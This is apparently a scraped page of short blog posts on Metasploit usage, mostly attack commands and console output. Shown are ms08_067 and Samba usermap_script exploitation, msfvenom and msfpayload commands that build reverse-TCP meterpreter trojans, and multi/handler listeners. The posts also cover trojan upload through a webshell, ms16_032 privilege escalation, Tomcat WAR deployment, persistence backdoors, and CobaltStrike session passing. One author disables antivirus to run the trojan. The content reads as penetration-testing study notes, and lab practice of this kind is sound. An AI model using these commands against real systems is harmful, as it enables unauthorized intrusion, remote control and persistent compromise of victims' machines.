msf

exploit/windows/smb/ms08_067_netapi

Posted by 前提是你 on 2019-11-26 09:22:40
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   generic/custom                                    normal  Custom Payload
   generic/debug_trap                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                normal  Generic x86 Tight Loop
   windows/adduser                                   normal  Windows Execute net user /ADD
   windows/dllinject/bind_ipv6_tcp                   normal  Reflective Dll

Privilege escalation with msf on Kali

Posted by 人盡茶涼 on 2019-11-26 09:22:22
Generate the trojan:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

Configure the listener (msfconsole opens Metasploit):
msf > use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.184.132
exploit

Now upload 1.exe to a writable directory through China Chopper or a webshell and execute it. The listener then connects and you obtain a session.
getuid: check the host name
shell: enter command-line mode (an exploit can of course also be loaded here)
exit: return to meterpreter mode
background: return to multi/handler
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc: load the exploit
session 1: the previous session
exploit: perform the privilege escalation

This shows the exploit ran successfully, so further privilege escalation and internal network penetration are possible.

Source: CSDN Author: 沧海NO1 Link: https://blog.csdn.net/u010025272/article

Metasploitable2 - tcp port 8180 - tomcat

Posted by 僤鯓⒐⒋嵵緔 on 2019-11-26 09:22:06
If the admin username and password for the Tomcat /manager page are known, a crafted WAR file can be deployed to obtain privileges on the server.

msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Exploit

Using MSF and CobaltStrike together

Posted by 陌路散爱 on 2019-11-26 09:21:54
Contents:
After obtaining a CobaltStrike session, spawning an MSF shell from it
After obtaining an MSF session, spawning a CobaltStrike shell from it

Source: CSDN Author: 谢公子 Link: https://blog.csdn.net/qq_36119192/article/details/98472536

03.[445]samba-linux

Posted by 淺唱寂寞╮ on 2019-11-26 09:21:39
msf > search samba
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
msf exploit(multi/samba/usermap_script) > set RHOST 192.168.56.120
msf exploit(multi/samba/usermap_script) > show options
msf exploit(multi/samba/usermap_script) > set RPORT 445
msf exploit(multi/samba/usermap_script) > set LHOST 192.168.56.119
msf exploit(multi/samba/usermap_script) > show options
msf exploit(multi/samba/usermap_script) > exploit

Note:
msf > set RHOST [victim_ip]
msf > set RPORT 445
msf > set LHOST [our_ip]
msf > set LPORT [use default]

Source

MSF study notes (11)

Posted by 自古美人都是妖i on 2019-11-26 09:21:23
Moved to Minggle’Blog

### Local privilege escalation vulnerability detection
meterpreter > run post/multi/recon/local_exploit_suggester

### Migrate to a specified process
migrate -N explorer.exe

### Automatic scripts
msf exploit(multi/handler) > set AutoRunScript migrate -n explorer.exe
msf exploit(multi/handler) > set InitialAutoRunScript migrate -n explorer.exe
msf exploit(multi/handler) > set AutoRunScript post/windows/gather/dumplinks

## migrate to a specified user's process

### Information gathering
meterpreter > run winenum

### Persistent backdoor
meterpreter > run persistence -h

OPTIONS:
    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none

Learning msf: trojans

Posted by 帅比萌擦擦* on 2019-11-26 09:21:07
msfpayload windows/meterpreter/reverse_tcp LHOST=10.24.194.155 LPORT=55555 X > text.exe
Generates a trojan file named text.exe.

msf > use exploit/multi/handler
Use the handler module.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
Use this shellcode.

LHOST: 10.24.194.155
LPORT: 55555
Fill in the IP and port used when the trojan was generated.

exploit
Run msf first, then run the trojan.

Because 360 was running it got killed right away; adding it to the trusted list still did not help, so I turned 360 off, opened it again, and it came back "killed". I was at a loss... For the commands after that... just use help...

After turning off both the firewall and 360, it worked, aha.

meterpreter > getuid
Server username: JINC\asus
Check privileges.

> ps
List processes; too many to paste here.

meterpreter > sysinfo
View basic information.
Computer        : JINC
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System

meterpreter: multi/handler

Posted by ぐ巨炮叔叔 on 2019-11-26 09:20:58
Reference: https://community.rapid7.com/thread/2083

In order to get multiple sessions on a single multi/handler, you need to set the ExitOnSession option to false and run exploit -j instead of just exploit. For example, for the meterpreter/reverse_tcp payload:

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost <local IP>
msf > set lport <local port>
msf > set ExitOnSession false
msf > exploit -j

The -j option keeps all the connected sessions in the background.

Source: CSDN Author: caiqiiqi Link: https://blog.csdn.net/caiqiiqi/article/details/73368173